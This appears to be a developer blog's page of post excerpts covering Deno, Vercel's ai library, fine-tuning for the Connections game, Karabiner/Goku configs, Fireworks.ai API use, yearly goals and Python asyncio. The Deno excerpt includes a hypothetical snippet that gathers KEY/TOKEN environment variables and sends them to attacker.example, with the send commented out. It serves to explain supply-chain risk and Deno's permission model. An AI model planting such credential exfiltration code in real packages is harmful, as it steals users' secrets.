I tried out Deno for the first time. Deno bills itself as

the most productive, secure, and performant JavaScript runtime for the modern programmer

Given my experience with it so far, I think it may have a case. One thing I immediately appreciated about Deno was how quickly I could go from zero to running code. It’s one of the things I like about Python that has kept me coming back despite a number of other shortcomings. Deno integrates easily into VS Code (Cursor) with the vscode_deno plugin. I found this plugin with a quick search in the marketplace.

Disclaimer: I am not a security expert or a security professional.

I’ve tried out many new AI/LLM libraries in the past year. Many of these are written in Python. While trying out new and exciting software is a lot of fun, it’s also important to be mindful about what code you allow to run on your system. Even if code is open source, it’s still possible that the cool open source library you installed includes code like
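For example (a purely hypothetical sketch; the attacker URL and the credential-matching heuristic are made up):

```python
import os

# A hypothetical malicious payload buried in a dependency: scan the
# environment for anything that looks like a credential...
secrets = {k: v for k, v in os.environ.items() if "KEY" in k or "TOKEN" in k}

# ...then quietly exfiltrate it (commented out so this snippet is harmless;
# the URL is made up):
# urllib.request.urlopen("https://attacker.example/collect", data=repr(secrets).encode())
```

This is the class of attack Deno’s permission model guards against: a Deno equivalent of this snippet would refuse to run without explicit `--allow-env` and `--allow-net` grants.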

Edit (2024-07-21): Vercel has updated the ai package to use different abstractions than the examples below. Consider reading their docs first before using the example below, which is out of date.

Vercel has a library called ai that is useful for building language model chat applications. I used it to help build Write Partner. The library has two main components:

  • A backend API, called by a frontend app, that streams language model responses
  • A React hook that provides access to the chat, its messages, and an API to fetch completions

When designing Write Partner, I started the chat session with the following messages

I started playing the NYTimes word game “Connections” recently, on the recommendation of a few friends. It has the kind of freshness that Wordle lost for me a long time ago. After playing Connections for a few days, I wondered whether an OpenAI language model could solve the game (the objective is to group 16 words into 4 categories of 4 words). I tried with gpt-4-32k and gpt-4-1106-preview, tweaking prompts for a few hours, and wasn’t able to make much progress. It’s certainly possible prompt engineering alone could solve this problem, but it wasn’t easy for me to find a path forward, and I imagine it would take a bit of creativity. I decided this was as good a time as any to try fine-tuning a model to do something I couldn’t easily get it to do with prompts.

Goku has a concept called a simlayer. A simlayer allows you to press any single key on the keyboard, then any second key while holding the first and trigger an arbitrary action as a result. I’m going to write a karabiner.edn config that opens Firefox when you press .+f.

{:simlayers {:launch-mode {:key :period}},
 :templates {:open-app "open -a \"%s\""},
 :main
 [{:des "launch mode",
   :rules [:launch-mode [:f [:open-app "Firefox"]]]}]}
❯ goku
Done!

To start, we define a simlayer for the period key. We will reference this layer when we define our rules. Next, we define a template. Each entry in :templates is a templated shell command that can run when a rule is satisfied. Finally, we define the “launch mode” rule in :main. We can call it anything we want; I chose “launch mode”. Now let’s break down the rule.

Karabiner is a keyboard customizer for macOS. I’ve used it for a while to map my caps lock key to cmd + ctrl + option + shift. This key combination is sometimes called a hyper key. With this keyboard override, I use other programs like Hammerspoon and Alfred to do things like toggle apps and open links. Karabiner provides an out-of-the-box, predefined rule to perform this complex modification. I’ve used this approach for a while but recently learned about Goku which adds a lot of additional functionality to Karabiner using Clojure’s extensible data notation (edn) to declaratively configure Karabiner.

I’ve started playing around with Fireworks.ai to run inference with open source language models via an API. Fireworks’ product is the best I’ve come across for this use case. While Fireworks has its own client, I wanted to try the OpenAI Python SDK compatibility approach, since I have a lot of code that uses the OpenAI SDK. It looks like Fireworks’ documented approach no longer works since OpenAI published version 1.0.0. I got this error message:
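As I understand it, openai>=1.0.0 replaced module-level configuration (openai.api_base, openai.api_key) with a client object, which is why the older documented pattern breaks. A sketch of what the compatibility setup amounts to, with the SDK pattern in comments and the underlying HTTP request built with the standard library (the model name and environment variable are illustrative):

```python
import json
import os
import urllib.request

# With openai>=1.0.0, Fireworks' OpenAI-compatible endpoint goes in base_url
# on a client object rather than the old module-level openai.api_base:
#
#   from openai import OpenAI
#   client = OpenAI(
#       base_url="https://api.fireworks.ai/inference/v1",
#       api_key=os.environ["FIREWORKS_API_KEY"],
#   )
#
# Under the hood, that amounts to a request like this:
payload = {
    "model": "accounts/fireworks/models/llama-v2-13b-chat",
    "messages": [{"role": "user", "content": "Hello!"}],
}
request = urllib.request.Request(
    "https://api.fireworks.ai/inference/v1/chat/completions",
    data=json.dumps(payload).encode(),
    headers={
        "Content-Type": "application/json",
        "Authorization": f"Bearer {os.environ.get('FIREWORKS_API_KEY', '')}",
    },
)
# urllib.request.urlopen(request)  # requires a real API key, so not run here
```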

At the beginning of 2023, I set some goals for myself. Here are those goals and how the year turned out.

Learn a new word each week (50%)

Clear and effective communication is important to me. My thought process was that I could improve as a communicator if I further developed my vocabulary. I also find it particularly satisfying to conjure the perfect word to describe a situation, experience, etc. Each Monday, I would find a new word and record it, its part of speech, and its definition in Obsidian. Periodically throughout the week, I would review the new word and all previous words using spaced repetition. This approach was relatively effective at first, but less so over the year. In total, I learned 24 new words. About halfway through the year, the Monday reminder to add a new word started landing at a bad time. I would put it off, then I fell behind and never caught back up. I could have rescheduled the reminder, but I didn’t. I’m not sure if I will try something like this again. I like the prospect of learning new words, but I’d prefer to do so less in a rote-memorization kind of way and more in a “search and discover cool words” kind of way.

In a previous note, I discussed running coroutines in a non-blocking manner using gather. That approach works well when you have a known, manageable number of coroutines to run. However, with tens, hundreds, or more tasks, especially when network calls are involved, it can be important to limit concurrency. We can use a semaphore to cap the number of coroutines running at once, blocking new ones until others have finished executing.
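A sketch of the pattern with asyncio.Semaphore (the sleep stands in for a network call, and the limit of 3 is arbitrary):

```python
import asyncio


async def fetch(i: int, sem: asyncio.Semaphore) -> int:
    async with sem:  # waits here until one of the 3 slots frees up
        await asyncio.sleep(0.1)  # stand-in for a network call
        return i


async def main() -> list[int]:
    sem = asyncio.Semaphore(3)  # at most 3 coroutines in flight at once
    return await asyncio.gather(*(fetch(i, sem) for i in range(10)))


results = asyncio.run(main())
print(results)  # gather preserves submission order: [0, 1, ..., 9]
```

All ten tasks are still created up front; the semaphore only gates how many are past the `async with` at any moment, so the run takes roughly four batches of 0.1s instead of failing or flooding the network.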

Python coroutines allow for asynchronous programming in a language that, for much of its history, only supported synchronous execution. I’ve previously compared a synchronous approach in Python to a parallel approach in Go using channels. If you’re familiar with async/await in JavaScript, Python’s syntax will look familiar. Python’s event loop allows coroutines to yield control back to the loop, awaiting their turn to resume execution, which can lead to more efficient use of resources. Using coroutines in Python differs from JavaScript in that they can easily, even accidentally, be intermingled with synchronously executing functions. Doing so can produce unexpected results, such as blocking the event loop and preventing other tasks from running concurrently.
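A minimal illustration of that pitfall, using time.sleep as the stand-in for an accidental synchronous call inside a coroutine:

```python
import asyncio
import time


async def blocking_tick() -> None:
    time.sleep(0.2)  # a sync call: blocks the entire event loop


async def cooperative_tick() -> None:
    await asyncio.sleep(0.2)  # yields control back to the event loop


async def timed(*coros) -> float:
    start = time.perf_counter()
    await asyncio.gather(*coros)
    return time.perf_counter() - start


cooperative = asyncio.run(timed(cooperative_tick(), cooperative_tick()))
blocking = asyncio.run(timed(blocking_tick(), blocking_tick()))
print(f"awaited sleeps: {cooperative:.2f}s, blocking sleeps: {blocking:.2f}s")
```

The awaited version overlaps its two sleeps (roughly 0.2s total), while the blocking version serializes them (roughly 0.4s), because time.sleep never gives the loop a chance to run the other task.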